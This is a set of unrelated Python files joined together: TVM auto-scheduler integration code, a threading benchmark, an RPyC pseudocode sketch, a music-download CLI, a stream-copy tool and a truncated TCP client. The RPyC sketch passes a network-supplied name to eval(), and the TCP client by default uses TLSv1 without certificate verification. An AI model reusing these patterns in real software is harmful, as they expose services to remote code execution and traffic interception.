env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get input/output tensors and
other useful information.
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors with static shape
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
has_complex_op: bool
Whether the topi compute function includes at least one complex (reduce) op
"""
layout_free_ops = []
inputs = []
has_complex_op = False
visited = set()
def traverse(t):
nonlocal has_complex_op
# We cannot directly add tensors to the set, because the comparison of
# two tensors with ndim=0 is ambiguous.
assert t.handle is not None
if t.handle.value in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
has_complex_op = has_complex_op or any([isinstance(e, Reduce) for e in t.op.body])
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t.handle.value)
for t in outs:
traverse(t)
io_tensors = inputs + list(outs)
for tensor in io_tensors:
# Reject the compute if any of its I/O tensors has dynamic shape.
if any([not isinstance(v, int) for v in get_const_tuple(tensor.shape)]):
return ([], False, False)
return (io_tensors, len(layout_free_ops) > 0, has_complex_op)
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(func_name, outs):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
func_name: str
The name of the function being scheduled.
outs: List[Tensor]
The output tensors of topi compute functions
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
None in the tracing mode so that the fallback topi schedule will be used.
"""
# pylint: disable=import-outside-toplevel
from tvm.auto_scheduler.measure import (
prepare_input_map,
) # lazily import to avoid recursive dependency
io_tensors, has_layout_free, has_complex_op = traverse_to_get_io_tensors(outs)
if not io_tensors: # The compute includes dynamic shapes which are not supported yet.
return None
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.workload_key(), io_tensors)
target = tvm.target.Target.current()
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag, func_name)
schedule = None
env = TracingEnvironment.current
if env is None:
# in the final build mode
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
return schedule
if env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
env.add_workload_key(func_name, key)
input_map = prepare_input_map(io_tensors)
if input_map:
env.add_workload_input_names(key, list(input_map.values()))
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if (
LayoutRewriteOption.get_target_default(target, True) != LayoutRewriteOption.NO_REWRITE
and has_layout_free
):
if state is None:
return None
# rewrite the layout and update the context for the new dag
new_dag = dag.rewrite_layout_from_state(state)
new_key = new_dag.workload_key()
if new_key != key:
dispatch_ctx.update(target, new_key, state)
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
@tvm._ffi.register_func("auto_scheduler.relay_integration.te_compiler_update_weights")
def te_compiler_update_weights(function_weights):
"""A callback for updating the weights of extracted tasks. When using the TE compiler
that avoids compiling the same function multiple times by caching, all extracted tasks
have weight 1, so the TE compiler invokes this callback at the end. In this case,
we override existing weights with the use_count in TE compiler cache.
Parameters
----------
function_weights: Dict[str, int]
Mapping from function names to their weights.
"""
env = TracingEnvironment.current
if env is not None:
# Override this map with the weights in the TE compiler.
env.wkl_key_to_weight = {}
for func_name, weight in function_weights.items():
# If the function name is not in the map, then it means we are not interested in
# this function during task extraction (e.g., a function without reduction).
if func_name not in env.func_name_to_wkl_key:
continue
workload_key = env.func_name_to_wkl_key[func_name]
if workload_key not in env.wkl_key_to_weight:
env.wkl_key_to_weight[workload_key] = (0, set())
# Note that the function appears multiple times in a model will be renamed
# to make sure function names are unique, so we use the workload key generated
# from the function's TE compute to determine their weights.
old_weight, func_names = env.wkl_key_to_weight[workload_key]
func_names.add(func_name)
env.wkl_key_to_weight[workload_key] = (old_weight + weight, func_names)
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
def is_auto_scheduler_enabled():
"""Return whether the auto-scheduler is enabled.
Parameters
----------
enabled: bool
Whether the auto-scheduler is enabled
"""
return PassContext.current().config.get("relay.backend.use_auto_scheduler", False)
|
io.py
|
from threading import Thread
from time import time
def benchmark(func):
def bench(*args, **kwargs):
start = time()
func(*args, **kwargs)
end = time()
duration = (end - start) * 1000
print("Run took {}ms".format(int(duration)))
return bench
def run(start, stop=None):
# build the start and stop args for range()
if stop is None:
args = [start]
else:
args = [start, stop]
for i in range(*args):
filename = 'files/{}.txt'.format(i)
with open(filename) as f:
f.read()
@benchmark
def unthreaded_run(start, stop=None):
run(start, stop)
@benchmark
def threaded_run(start, stop=None, thread_count=4):
threads = []
block_size = 1000 // thread_count
for i in range(thread_count):
start = i * block_size
stop = (i+1) * block_size
thread = Thread(target=run, kwargs={'start': start, 'stop': stop})
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
print("Unthreaded access to 1000 files...")
unthreaded_run(1000)
print("Threaded access to 1000 files...")
threaded_run(1000, thread_count=4)
|
isp-pseudo.py
|
class ServiceHandlerService(rpyc.Service): # RPyC implementation
def on_connect(self, conn):
pass
def on_disconnect(self, conn):
pass
def exposed_echo(self, attrs[]
):
proc = pool.Process(target=echo, args=(main_queue, main_event, value, return_list))
proc.daemon = True
proc.start()
proc.join()
return return_list
def exposed_ping(self, attrs[]
):
...
def exposed_introduce_me(self, attrs[]
):
...
def exposed_detruce_me(self, attrs[]
):
...
class ServiceHandlerService(rpyc.Service):
def on_connect(self, conn):
pass
def on_disconnect(self, conn):
pass
def on_exposed_eval_service(self, target, attrs_list):
proc = pool.Process(target=eval(target), args=(main_queue, main_event, attrs_list, return_list))
proc.daemon = True
proc.start()
proc.join()
return return_list
def echo(value, return_list):
try:
conn = rpyc.connect("0.0.0.0", 18862, config={"sync_request_timeout": 300})
server = conn.root
response = server.echo("Echo", value)
return_list.append(response)
conn.close()
return return_list
except Exception:
import traceback
traceback.print_exc()
print("EXCEPT ('{0}', {1}) with fd {2}".format(addr, port, fileno))
if __name__ == '__main__':
args = get_args(name, server_list) #python isp.py [--name "name"] [--server_list google,ip,port]
service_handler_server = ThreadedServer(service=ServiceHandlerService, port=18862, ... )
service_handler_server.start
name = args.name
server_list = args.serverlist
if (args != None):
for server in server_list:
server_process = start_process(server.name, server.ip, server.port) #handshake/initial connection
server_process_list.add(server_process)
while(alive):
client_listener = start_listening_process()
if (client_listener.has_inc_HS):
client_process = client_listener.fork()
client_process_list.add(client_process)
|
__main__.py
|
#!/usr/bin/env python
# -*- coding:utf-8 _*-
"""
@author: HJK
@file: main.py
@time: 2019-01-08
"""
import sys
import re
import threading
import click
import logging
from . import config
from .utils import colorize
from .core import music_search, music_download, music_list_merge, get_sequence
def run():
logger = logging.getLogger(__name__)
music_list = []
thread_pool = []
errors = []
click.echo(
"\nSearching %s from ..." % colorize(config.get("keyword"), "yellow"), nl=False
)
# 多线程搜索
for source in config.get("source").split():
t = threading.Thread(target=music_search, args=(source, music_list, errors))
thread_pool.append(t)
t.start()
for t in thread_pool:
t.join()
# 分割线
click.echo("\n---------------------------\n")
# 输出错误信息
for err in errors:
logger.error("Get %s music list failed." % err[0].upper())
logger.error(err[1])
# 对搜索结果排序和去重
if config.get("merge"):
music_list = music_list_merge(music_list)
# 遍历输出搜索列表
for index, music in enumerate(music_list):
music.idx = index
click.echo(music.info)
# 分割线
click.echo("\n---------------------------")
# 用户指定下载序号
prompt = "请输入%s,支持形如 %s 的格式,输入 %s 跳过下载\n >>" % (
colorize("下载序号", "yellow"),
colorize("0 3-5 8", "yellow"),
colorize("N", "yellow"),
)
choices = click.prompt(prompt)
while choices.lower() != "n" and not re.match(
r"^((\d+\-\d+)|(\d+)|\s+)+$", choices
):
choices = click.prompt("%s%s" % (colorize("输入有误!", "red"), prompt))
selected_list = get_sequence(choices)
for idx in selected_list:
music_download(idx, music_list)
# 下载完后继续搜索
keyword = click.prompt("请输入要搜索的歌曲,或Ctrl+C退出\n >>")
config.set("keyword", keyword)
run()
@click.command()
@click.version_option()
@click.option(
"-k", "--keyword", prompt="请输入要搜索的歌曲,名称和歌手一起输入可以提高匹配(如 空帆船 朴树)\n >>", help="搜索关键字"
)
@click.option(
"-s",
"--source",
default="qq netease kugou baidu xiami",
help="数据源目前支持qq netease kugou baidu xiami flac",
)
@click.option("-c", "--count", default=5, help="搜索数量限制")
@click.option("-o", "--outdir", default=".", help="指定输出目录")
@click.option("-x", "--proxy", default="", help="指定代理(如http://127.0.0.1:1087)")
@click.option("-m", "--merge", default=False, is_flag=True, help="对搜索结果去重和排序(默认不去重)")
@click.option("-v", "--verbose", default=False, is_flag=True, help="详细模式")
def main(keyword, source, count, outdir, proxy, merge, verbose):
"""
Search and download music from netease, qq, kugou, baidu and xiami.
Example: music-dl -k "周杰伦"
"""
# 初始化全局变量
config.init()
config.set("keyword", keyword)
config.set("source", source)
config.set("count", min(count, 50))
config.set("outdir", outdir)
config.set("merge", merge)
config.set("verbose", verbose)
if proxy:
proxies = {"http": proxy, "https": proxy}
config.set("proxies", proxies)
level = logging.INFO if verbose else logging.WARNING
logging.basicConfig(
level=level,
format="[%(asctime)s] %(levelname)-8s | %(name)s: %(msg)s ",
datefmt="%Y-%m-%d %H:%M:%S",
)
try:
run()
except (EOFError, KeyboardInterrupt):
sys.exit(0)
if __name__ == "__main__":
main()
|
streamcopy.py
|
#!/usr/bin/env python2
import os
import sys
import time
import optparse
import threading
import signal
import glob
import traceback
# the size of block used to find the position of end of DST in SRC.
# note: false-positive (too small) or false-negative (too large) will
# cause data duplication.
PATTERN_SIZE = 4096
BUFSIZE = 1<<20
BATCH_SIZE = 1024
WAIT_DURATION = 0.1
source_paths = {}
open_files = {}
running = True
def log(msg):
sys.stderr.write("[" + time.asctime() + "] INFO " + msg + "\n")
def search_pattch(f, pattern):
if not pattern: return 0
buff = ''
pos = 0
f.seek(pos)
while True:
buff += f.read(BUFSIZE)
if len(buff) < len(pattern):
return 0
n = buff.find(pattern)
if n >= 0:
return pos + n + len(pattern)
pos += len(buff) - len(pattern) + 1
buff = buff[-len(pattern)+1:]
return 0
def get_fsize(f):
return os.fstat(f.fileno()).st_size
def find_last_pos(fin, fout):
isize = get_fsize(fin)
osize = get_fsize(fout)
vl = min(min(osize, PATTERN_SIZE), isize)
if osize <= isize and vl < isize and vl < osize:
block = fin.read(vl)
fout.seek(0)
if fout.read(vl) == block:
return osize
fout.seek(osize-vl)
pattern = fout.read(vl)
return search_pattch(fin, pattern)
def stream(src, dst, option):
fout = open(dst, 'ab+', BUFSIZE+4096)
fin = open(src, 'rb')
pos = get_fsize(fout)
if option.resume:
pos = find_last_pos(fin, fout)
fout.seek(0, 2)
log('start copying %s at %d' % (src, pos))
fin.seek(pos)
while running:
line = fin.read(BUFSIZE)
if not line:
while running and get_fsize(fin) == pos:
if os.path.exists(src) and os.path.getsize(src) != pos:
break # rotated
time.sleep(WAIT_DURATION)
if not os.path.exists(src) or option.deleteAfter and time.time() > os.path.getmtime(src)+option.deleteAfter:
fin.close()
if os.path.exists(src):
log("remove %s" % src)
os.remove(src)
del source_paths[src]
fout.close()
return
if not running:
return
csize = get_fsize(fin)
if csize > pos:
# tell File to read more data
fin.seek(pos)
else:
fin.close()
fin = open(src, 'rb')
pos = 0
continue
pos += len(line)
last_copied = time.time()
while running:
try:
fout.write(line)
fout.flush()
break
except ValueError:
# closed by rotate
fout = open(dst, 'ab+', BUFSIZE+4096)
def start_thread(func, args):
def target():
try:
func(*args)
except Exception as e:
sys.stderr.write(str(e)+'\n')
t = threading.Thread(target=target)
t.daemon = True
t.start()
return t
def start_stream(src, dst, option):
def safe_stream(src, dst, option):
try:
stream(src, dst, option)
except Exception as e:
print("stream", str(e))
traceback.print_exc()
source_paths.pop(src, None)
return start_thread(safe_stream, (src, dst, option))
def discover_new_file(src, dst, option):
while running:
now = time.time()
for root, dirs, names in os.walk(src):
if len(root) > len(src)+1:
t = os.path.join(dst, root[len(src)+1:])
else:
t = root
if not os.path.exists(t):
try: os.makedirs(t)
except: pass
for n in names:
p = os.path.join(root, n)
try:
if os.path.getsize(p) == 0 and os.path.getmtime(p)+option.deleteAfter < now:
os.remove(p)
continue
if p not in source_paths and os.path.isfile(p):
t = os.path.join(dst, p[len(src)+1:])
source_paths[p] = start_stream(p, t, option)
except Exception as e:
print("found", p, str(e))
time.sleep(1)
def rotate(signum, frame):
for f in open_files:
open_files[f].close()
def interrupted(signum, frame):
print("interrupted")
global running
running = False
os._exit(1)
def main():
parser = optparse.OptionParser("streamcopy.py SRC DST [OPTIONS]")
parser.add_option("--pid", help="path for pid (SIGHUP to rotate)")
parser.add_option("--delete-after", dest="deleteAfter", type=int,
help="delete files after no new data for N seconds")
parser.add_option("--resume", action="store_true",
help="resume copying based on guessed position "
+ "(try to find first occurrence of last block of output file "
+ " in input stream).")
option, args = parser.parse_args()
if len(args) < 2:
parser.print_usage()
return
src, dst = args
if not os.path.exists(dst):
os.makedirs(dst)
if option.pid:
with open(option.pid, 'w') as f:
f.write(str(os.getpid()))
signal.signal(signal.SIGHUP, rotate)
signal.signal(signal.SIGINT, interrupted)
start_thread(discover_new_file, (src, dst, option))
while running:
time.sleep(1)
if __name__ == '__main__':
main()
|
TcpClient.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------
# Copyright (c) 2010-2021 Denis Machard
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -------------------------------------------------------------------
"""
Tcp client module
"""
import errno
import sys
import struct
import ssl
import time
import socket
import select
import threading
try:
import xrange
except ImportError: # support python3
xrange = range
try:
import Queue
except ImportError: # support python 3
import queue as Queue
from ea.libs.NetLayerLib import WebSocket
# unicode = str with python3
if sys.version_info > (3,):
unicode = str
else:
# these exceptions does not exist in python2.X
class ConnectionAbortedError(Exception):
pass
class ConnectionRefusedError(Exception):
pass
class ConnectionResetError(Exception):
pass
PROXY_TYPE_NONE = -1
PROXY_TYPE_SOCKS4 = 0
PROXY_TYPE_SOCKS5 = 1
PROXY_TYPE_HTTP = 2
class TcpClientThread(threading.Thread):
"""
Tcp client thread
"""
def __init__(self, serverAddress=None, localAddress=('', 0), inactivityTimeout=30,
keepAliveInterval=20, timeout=5, proxyAddress=None, proxyUserId=b'client',
selectTimeout=0.01, terminator=b'\x00',
sslSupport=False, sslVersion=ssl.PROTOCOL_TLSv1, checkSsl=False,
wsSupport=False, wsMaxPayloadSize=WebSocket.WEBSOCKET_MAX_BASIC_DATA1024,
tcpKeepAlive=True, tcpKeepIdle=3, tcpKeepCnt=3, tcpKeepIntvl=3):
"""
TCP Client thread
@param serverAddress: remote ip or hostname and port
@type serverAddress: tuple
@param localAddress: local bind on ip and port
@type localAddress: tuple
@param inactivityTimeout: default value of 30 seconds
@type inactivityTimeout: Integer
@param keepAliveInterval: default value of 20 seconds, ping or pong with websocket
@type keepAliveInterval: integer
@param timeout: default value of 5 second
@type timeout: integer
@param proxyAddress: proxy address
@type proxyAddress: integer
@param proxyUserId: default value : client
@type proxyUserId: string
@param selectTimeout: socket io timeout, default value of 0.01
@type selectTimeout: integer
@param terminator: packet terminator, default value 0x00
@type terminator: integer
@param wsSupport: websocket support
@type wsSupport: boolean
@param sslSupport: ssl support
@type sslSupport: boolean
@param sslVersion: default value of 1 second
@type sslVersion: integer
@param wsMaxPayloadSize: websocket payload size
@type wsMaxPayloadSize: integer
"""
threading.Thread.__init__(self)
self.serverAddress = serverAddress
self.proxyAddress = proxyAddress # sock4
self.localAddress = localAddress
self.serverDstHostname = None
# proxy
self.proxyDstHostname = None
self.proxyConnectSuccess = False
self.proxyType = PROXY_TYPE_NONE
self.proxyUserId = proxyUserId
# web socket
self.wsCodec = WebSocket.WebSocketCodec(parent=self)
self.wsSupport = wsSupport
if wsSupport:
self.trace(
'Web socket activated - version %s' %
WebSocket.WEBSOCKET_VERSION)
self.wsHandshakeSuccess = False
self.wsKey = b''
self.wsMaxPayloadSize = wsMaxPayloadSize
# ssl
self.sslSupport = sslSupport
self.sslVersion = sslVersion
self.checkSsl = checkSsl
if sslSupport:
self.trace('Ssl activated - version %s' % self.sslVersion)
# buffer
self.buf = b''
self.bufWs = b''
self.queue = Queue.Queue(0)
self.event = threading.Event()
self.socket = None
self.running = True
self.closeSocket = False
self.inactivityServer = False
self.timeout = timeout
self.terminator = terminator
self.keepAlivePdu = b''
self.inactivityTimeout = inactivityTimeout
self.keepAliveInterval = keepAliveInterval
self.selectTimeout = float(selectTimeout)
self.tcpKeepAlive = tcpKeepAlive
self.tcpKeepIdle = tcpKeepIdle
self.tcpKeepIntvl = tcpKeepIntvl
self.tcpKeepCnt = tcpKeepCnt
self.trace('Tcp Client Thread Initialized')
def unsetProxy(self):
"""
Unset the proxy
"""
self.proxyAddress = None
self.proxyDstHostname = None
self.proxyConnectSuccess = False
self.proxyType = PROXY_TYPE_NONE
def setProxyAddress(self, ip, port):
"""
Set the destination server address
@param ip: destination ip address
@type ip: string
@param port: destination tcp port
@type port: Integer
@return:
@rtype:
"""
try:
if not len(ip):
return None
self.proxyAddress = (ip, port)
# check if ip or dns
# (hostname, aliaslist, ipaddrlist)
ret = socket.gethostbyname(str(ip))
if ret != ip:
self.proxyAddress = (ret, port)
self.proxyDstHostname = ip
except Exception as e:
self.error(e)
self.onResolveHostnameProxyFailed(err=e)
return None
return self.proxyAddress
def setServerAddress(self, ip, port):
"""
Set the destination server address
@param ip: destination ip address
@type ip: string
@param port: destination tcp port
@type port: Integer
@return:
@rtype:
"""
try:
self.serverAddress = (ip, port)
# check if ip or dns
# (hostname, aliaslist, ipaddrlist)
ret = socket.gethostbyname(str(ip))
if ret != ip:
self.serverAddress = (ret, port)
self.serverDstHostname = ip
except Exception as e:
if sys.version_info > (3,): # python 3 support
self.error(str(e))
self.onResolveHostnameFailed(err=str(e))
else:
self.error(str(e).decode('iso-8859-15'))
self.onResolveHostnameFailed(err=str(e).decode('iso-8859-15'))
return None
return self.serverAddress
def sendProxySocks4Request(self):
"""
Requesting socks4 proxy
"""
self.proxyType = PROXY_TYPE_SOCKS4
try:
destIp, destPort = self.serverAddress
# Construct the request packet
ipAddr = socket.inet_aton(destIp)
# 0x04 = version = socks4
# 0x01 = command = connect
req = b"\x04\x01" + struct.pack(">H", destPort) + ipAddr
# Add userid
req += self.proxyUserId
# send packet
self.sendPacket(packet=req)
except Exception as e:
self.error("unable to initiate proxy socks4: %s" % str(e))
def sendProxySocks5Request(self, login=None, password=None):
"""
Requesting socks5 proxy
"""
self.proxyType = PROXY_TYPE_SOCKS5
try:
if login is not None and password is not None: # The username/password
req = b"\x05\x02\x00\x02"
else:
req = b"\x05\x01\x00" # No username/password were entered
# send packet
self.sendPacket(packet=req)
except Exception as e:
self.error("unable to initiate proxy socks5: %s" % str(e))
def sendProxyHttpRequest(self):
"""
Requesting http proxy
"""
self.proxyType = PROXY_TYPE_HTTP
try:
destIp, destPort = self.serverAddress
if self.serverDstHostname is not None:
destIp = self.serverDstHostname
# Construct request
reqProxy = []
reqProxy.append("CONNECT %s:%s HTTP/1.1" % (destIp, str(destPort)))
reqProxy.append("Host: %s:%s" % (destIp, str(destPort)))
reqProxy.append("")
reqProxy.append("")
# send packet
self.sendHttpPacket(packet="\r\n".join(reqProxy))
except Exception as e:
self.error("unable to initiate proxy http: %s" % e)
def handshakeWebSocket(self, resource="/", hostport='localhost'):
"""
Build websocket handshake and send-it
"""
try:
# construct handshake
headers = []
headers.append("GET %s HTTP/1.1" % resource)
headers.append("Upgrade: websocket")
headers.append("Connection: keep-alive, upgrade")
headers.append("Host: %s" % hostport)
headers.append("Origin: http://%s" % hostport)
self.wsKey = self.wsCodec.createSecWsKey()
headers.append("Sec-WebSocket-Key: %s" % self.wsKey)
headers.append(
"Sec-WebSocket-Version: %s" %
WebSocket.WEBSOCKET_VERSION)
headers.append("")
headers.append("")
# send packet
self.sendHttpPacket(packet="\r\n".join(headers))
except Exception as e:
self.error("unable to initiate web socket: %s" % e)
def startConnection(self, threadingConnect=True):
"""
Start connection
"""
if threadingConnect:
t = threading.Thread(target=self.__startConnection)
t.start()
else:
self.__startConnection()
def __startConnection(self):
"""
Starts TCP connection (SYN)
"""
self.inactivityServer = False
self.wsHandshakeSuccess = False
self.proxyConnectSuccess = False
if self.proxyAddress is not None:
self.trace(
"connecting from %s to %s with the proxy %s" %
(str(
self.localAddress), str(
self.serverAddress), str(
self.proxyAddress)))
else:
self.trace(
"connecting from %s to %s" %
(str(
self.localAddress), str(
self.serverAddress)))
try:
self.buf = b''
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.tcpKeepAlive:
self.socket.setsockopt(
socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if sys.platform == "win32":
if self.tcpKeepAlive:
self.socket.ioctl(socket.SIO_KEEPALIVE_VALS,
(1, self.tcpKeepIdle * 1000, self.tcpKeepIntvl * 1000))
elif sys.platform == "darwin":
# interval in seconds between keepalive probes
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPINTVL,
self.tcpKeepIntvl)
# failed keepalive probes before declaring the other end dead
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPCNT,
self.tcpKeepCnt)
else:
# seconds before sending keepalive probes
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPIDLE,
self.tcpKeepIdle)
# interval in seconds between keepalive probes
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPINTVL,
self.tcpKeepIntvl)
# failed keepalive probes before declaring the other end dead
if self.tcpKeepAlive:
self.socket.setsockopt(socket.SOL_TCP,
socket.TCP_KEEPCNT,
self.tcpKeepCnt)
if self.sslSupport and self.proxyAddress is None:
certReqs = ssl.CERT_NONE
if self.checkSsl:
certReqs = ssl.CERT_REQUIRED
self.socket = ssl.wrap_socket(self.socket,
cert_reqs=certReqs,
ssl_version=self.sslVersion)
self.socket.settimeout(self.timeout)
self.socket.bind(self.localAddress)
if self.proxyAddress is not None:
self.socket.connect(self.proxyAddress)
self.lastActivityTimestamp = time.time()
self.lastKeepAliveTimestamp = time.time()
self.event.set()
self.trace("proxy connected.")
self.onProxyConnection()
else:
self.socket.connect(self.serverAddress)
self.lastActivityTimestamp = time.time()
self.lastKeepAliveTimestamp = time.time()
self.event.set()
self.trace("connected.")
self.onConnection()
except socket.timeout as e:
if self.proxyAddress is not None:
self.error("socket tcp proxy %s on connection." % (str(e)))
self.onProxyConnectionTimeout(err=str(e))
else:
self.error("socket tcp %s on connection." % (str(e)))
self.onConnectionTimeout(err=str(e))
except Exception as e:
if self.proxyAddress is not None:
self.error("Proxy %s." % (str(e)))
self.onProxyConnectionRefused(err=str(e))
else:
self.error("%s." % (str(e)))
self.onConnectionRefused(err=str(e))
def closeConnection(self):
"""
Close TCP connection (RESET)
"""
self.closeSocket = True
def run(self):
"""
Main loop
"""
while self.running:
self.event.wait()
if self.running:
try:
# check if we have incoming data
if self.socket is not None:
r, w, e = select.select(
[self.socket], [], [self.socket], self.selectTimeout)
if self.socket in e:
raise EOFError(
"socket select error: disconnecting")
elif self.socket in r:
read = self.socket.recv(8192)
if not read:
raise EOFError("no more data, connection lost")
else:
self.lastActivityTimestamp = time.time()
self.buf = b''.join([self.buf, read])
self.onIncomingData()
# Check inactivity timeout
elif self.inactivityTimeout:
if time.time() - self.lastActivityTimestamp > self.inactivityTimeout:
if self.proxyAddress is not None:
raise EOFError(
"Inactivity proxy/server timeout")
else:
raise EOFError("Inactivity timeout")
if self.wsSupport:
# Prepare Keep-Alive if needed
keepAlive = False
if self.wsSupport and self.wsHandshakeSuccess:
keepAlive = True
if keepAlive:
if self.keepAliveInterval:
if time.time() - self.lastKeepAliveTimestamp > self.keepAliveInterval:
self.lastKeepAliveTimestamp = time.time()
wsping, pingId = self.wsCodec.encodePing()
self.trace(
"sending ws ping message id=%s" % pingId)
self.queue.put(wsping)
else: # old style
# Prepare Keep-Alive if needed
keepAlive = False
if self.proxyAddress is not None and self.proxyConnectSuccess:
keepAlive = True
else:
if self.proxyAddress is None:
keepAlive = True
# Send (queue) a Keep-Alive if needed, old style
if keepAlive:
if self.keepAliveInterval:
if time.time() - self.lastKeepAliveTimestamp > self.keepAliveInterval:
self.lastKeepAliveTimestamp = time.time()
# self.lastActivityTimestamp = time.time()
self.trace("sending keep-alive")
self.sendPacket(self.keepAlivePdu)
# send queued messages
while not self.queue.empty():
r, w, e = select.select(
[], [
self.socket], [
self.socket], self.selectTimeout)
if self.socket in e:
raise EOFError(
"socket select error when sending a message: disconnecting")
elif self.socket in w:
try:
message = self.queue.get(False)
self.socket.sendall(message)
del message
except Queue.Empty:
if self.closeSocket:
self.event.set()
except Exception as e:
self.error(
"unable to send message: " + str(e))
else:
break
except EOFError as e:
if "Inactivity timeout" in str(e):
self.error("disconnecting, inactivity timeout")
self.inactivityServer = True
# self.onInactivityTimeout()
self.event.clear()
self.closeSocket = True
else:
self.error("disconnected by the server: %s" % str(e))
self.onDisconnection(byServer=True)
self.event.clear()
# new with python3
except ConnectionAbortedError:
self.error("connection aborted by peer")
self.onDisconnection(byServer=True)
self.event.clear()
except ConnectionRefusedError:
self.error("connection refused by peer")
self.onDisconnection(byServer=True)
self.event.clear()
except ConnectionResetError:
self.error("connection reseted by peer")
self.onDisconnection(byServer=True)
self.event.clear()
# end of new
# new in v20, for alpine support
except select.error as e:
_errno, _ = e
if _errno != errno.EINTR:
raise
# end of new
except Exception as e:
if "[Errno 10054]" in str(e):
self.error("connection reseted by peer")
self.onDisconnection(byServer=True)
self.event.clear()
else:
self.error("generic error on run: %s" % str(e))
self.closeSocket = True
self.event.clear()
# close socket
if self.closeSocket:
self.trace("cleanup socked")
if self.socket is not None:
# cleanup the queue
while not self.queue.empty():
try:
message = self.queue.get(False)
self.socket.sendall(message)
except Queue.Empty:
pass
# close the tcp connection
self.trace("closing socket")
self.socket.close()
# cleanup the buffer
self.buf = b''
self.closeSocket = False
self.onDisconnection(
inactivityServer=self.inactivityServer)
self.event.clear()
self.trace("closed")
self.onDisconnection()
def onIncomingData(self):
"""
Called on incoming data
"""
try:
if self.running:
# handle proxy handshake
readTrueData = False
if self.proxyAddress is not None and not self.proxyConnectSuccess and self.buf:
self.trace(
'data received for proxy handshake of len %s' % len(
self.buf))
readTrueData = self.decodeProxyResponse()
if self.proxyConnectSuccess:
self.onProxyConnectionSuccess()
else:
readTrueData = True
# handle websocket handshake
readTrueData = False
if self.wsSupport and not self.wsHandshakeSuccess and self.buf:
if not readTrueData and not self.proxyConnectSuccess and self.proxyAddress is not None:
pass
else:
self.trace(
'data received for ws handshake of len %s' % len(
self.buf))
readTrueData = self.decodeWsHandshake()
if self.wsHandshakeSuccess:
self.onWsHanshakeSuccess()
else:
readTrueData = True
# handle other data
if readTrueData: # other than proxy and websocket handshake
if self.wsSupport:
(data, opcode, left, needmore) = self.wsCodec.decodeWsData(
buffer=self.buf)
self.buf = left
if not needmore:
if opcode == WebSocket.WEBSOCKET_OPCODE_TEXT:
